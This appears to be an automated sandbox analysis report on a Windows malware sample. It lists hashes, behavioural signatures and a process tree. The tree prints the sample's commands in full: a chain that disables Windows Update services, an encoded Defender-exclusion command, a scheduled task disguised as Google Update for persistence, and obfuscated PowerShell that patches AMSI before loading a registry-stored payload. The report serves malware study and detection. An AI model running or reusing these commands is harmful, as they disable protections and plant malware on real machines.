Analysis
-
max time kernel
48s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
05-05-2022 00:56
Static task
static1
Behavioral task
behavioral1
Sample
File.exe
Resource
win7-20220414-en
General
-
Target
File.exe
-
Size
4.0MB
-
MD5
f74ccaec9935cca19122478058c39f79
-
SHA1
5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
-
SHA256
8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
-
SHA512
2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Executes dropped EXE 2 IoCs
Processes:
[New]344334.exeger.exepid process 4812 [New]344334.exe 460 ger.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 760 takeown.exe 2624 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
[New]344334.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation [New]344334.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 760 takeown.exe 2624 icacls.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 35 ip-api.com -
Suspicious use of SetThreadContext 2 IoCs
Processes:
ger.exe[New]344334.exedescription pid process target process PID 460 set thread context of 4852 460 ger.exe AppLaunch.exe PID 4812 set thread context of 4444 4812 [New]344334.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5112 3308 WerFault.exe 3968 1484 WerFault.exe 400 1484 WerFault.exe 5072 3308 WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 61 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE -
Modifies registry key 1 TTPs 8 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4448 reg.exe 4284 reg.exe 1360 reg.exe 2576 reg.exe 2112 reg.exe 2128 reg.exe 2356 reg.exe 5096 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exe[New]344334.exepowershell.EXEpowershell.EXEpid process 1048 powershell.exe 1048 powershell.exe 4812 [New]344334.exe 2452 powershell.EXE 2452 powershell.EXE 2872 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeAppLaunch.exe[New]344334.exepowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 4852 AppLaunch.exe Token: SeDebugPrivilege 4812 [New]344334.exe Token: SeDebugPrivilege 2452 powershell.EXE Token: SeDebugPrivilege 2872 powershell.EXE -
Suspicious use of WriteProcessMemory 47 IoCs
Processes:
File.exeger.exe[New]344334.execmd.execmd.execmd.exedescription pid process target process PID 3032 wrote to memory of 4812 3032 File.exe [New]344334.exe PID 3032 wrote to memory of 4812 3032 File.exe [New]344334.exe PID 3032 wrote to memory of 460 3032 File.exe ger.exe PID 3032 wrote to memory of 460 3032 File.exe ger.exe PID 3032 wrote to memory of 460 3032 File.exe ger.exe PID 460 wrote to memory of 4852 460 ger.exe AppLaunch.exe PID 460 wrote to memory of 4852 460 ger.exe AppLaunch.exe PID 460 wrote to memory of 4852 460 ger.exe AppLaunch.exe PID 460 wrote to memory of 4852 460 ger.exe AppLaunch.exe PID 460 wrote to memory of 4852 460 ger.exe AppLaunch.exe PID 4812 wrote to memory of 2132 4812 [New]344334.exe cmd.exe PID 4812 wrote to memory of 2132 4812 [New]344334.exe cmd.exe PID 2132 wrote to memory of 1048 2132 cmd.exe powershell.exe PID 2132 wrote to memory of 1048 2132 cmd.exe powershell.exe PID 4812 wrote to memory of 4220 4812 [New]344334.exe cmd.exe PID 4812 wrote to memory of 4220 4812 [New]344334.exe cmd.exe PID 4220 wrote to memory of 4292 4220 cmd.exe sc.exe PID 4220 wrote to memory of 4292 4220 cmd.exe sc.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4812 wrote to memory of 4444 4812 [New]344334.exe conhost.exe PID 4220 wrote to memory of 540 4220 cmd.exe sc.exe PID 4220 wrote to memory of 540 4220 cmd.exe sc.exe PID 4220 wrote to memory of 2192 4220 cmd.exe sc.exe PID 4220 wrote to memory of 2192 4220 cmd.exe sc.exe PID 4812 wrote to memory of 780 4812 [New]344334.exe cmd.exe PID 4812 wrote to memory of 780 4812 [New]344334.exe cmd.exe PID 4220 wrote to memory of 1060 4220 cmd.exe sc.exe PID 4220 wrote to memory of 1060 4220 cmd.exe sc.exe PID 780 wrote to memory of 1820 780 cmd.exe schtasks.exe PID 780 wrote to memory of 1820 780 cmd.exe schtasks.exe PID 4220 wrote to memory of 4260 4220 cmd.exe sc.exe PID 4220 wrote to memory of 4260 4220 cmd.exe sc.exe PID 4220 wrote to memory of 5096 4220 cmd.exe reg.exe PID 4220 wrote to memory of 5096 4220 cmd.exe reg.exe PID 4220 wrote to memory of 4448 4220 cmd.exe reg.exe PID 4220 wrote to memory of 4448 4220 cmd.exe reg.exe PID 4220 wrote to memory of 4284 4220 cmd.exe reg.exe PID 4220 wrote to memory of 4284 4220 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeC:\Users\Admin\AppData\Roaming\[New]344334.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\Chrome\chrome.exeC:\Users\Admin\AppData\Roaming\Chrome\chrome.exe4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="6⤵
-
C:\Users\Admin\AppData\Roaming\ger.exeC:\Users\Admin\AppData\Roaming\ger.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rGLtOhFiCmid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IwlXkGEmwqZBmS,[Parameter(Position=1)][Type]$ghxqtBRSGB)$HYTXuBcoLdx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$HYTXuBcoLdx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');$HYTXuBcoLdx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ghxqtBRSGB,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');Write-Output $HYTXuBcoLdx.CreateType();}$keeKgdZqwcuQu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$lmBRnGZddYhsRU=$keeKgdZqwcuQu.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hNATbfoaebXSkoaAPIh=rGLtOhFiCmid @([String])([IntPtr]);$kXcPDjeZCvAGqHbJmWRqdf=rGLtOhFiCmid @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kFDUHJKPfVu=$keeKgdZqwcuQu.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$sorrBYAHgsjTLX=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Load'+'LibraryA')));$XgDywUZjNrbTqCukt=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Vir'+'tual'+'Pro'+'tect')));$BTwuEjv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sorrBYAHgsjTLX,$hNATbfoaebXSkoaAPIh).Invoke('a'+'m'+'si.dll');$VLgICEuFpaNOwkUMk=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$BTwuEjv,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VHdOFdKCSa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,4,[ref]$VHdOFdKCSa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$VLgICEuFpaNOwkUMk,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,0x20,[ref]$VHdOFdKCSa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lidnqEOIVwEG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vNUMrRLSZXBjgG,[Parameter(Position=1)][Type]$AnHDgJfxAO)$WgstumZpaFr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$WgstumZpaFr.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');$WgstumZpaFr.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$AnHDgJfxAO,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');Write-Output $WgstumZpaFr.CreateType();}$hBQlRohaBMdUo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rMJmrNKHNnAqkY=$hBQlRohaBMdUo.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XhsktYzjyMofJVtXwqs=lidnqEOIVwEG @([String])([IntPtr]);$DquWmwJESRZiqJSKfIKhvr=lidnqEOIVwEG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pUouaoPSBEI=$hBQlRohaBMdUo.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$xrMJDGyXylXHva=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Load'+'LibraryA')));$DboijGHkrpDUyNTWk=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Vir'+'tual'+'Pro'+'tect')));$QWDsDYe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xrMJDGyXylXHva,$XhsktYzjyMofJVtXwqs).Invoke('a'+'m'+'si.dll');$POdrWVseLQWFgGpcg=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$QWDsDYe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WedNKnyFXl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,4,[ref]$WedNKnyFXl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$POdrWVseLQWFgGpcg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,0x20,[ref]$WedNKnyFXl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{364bf40b-3cad-4ad6-9fa8-d40b12851d88}1⤵
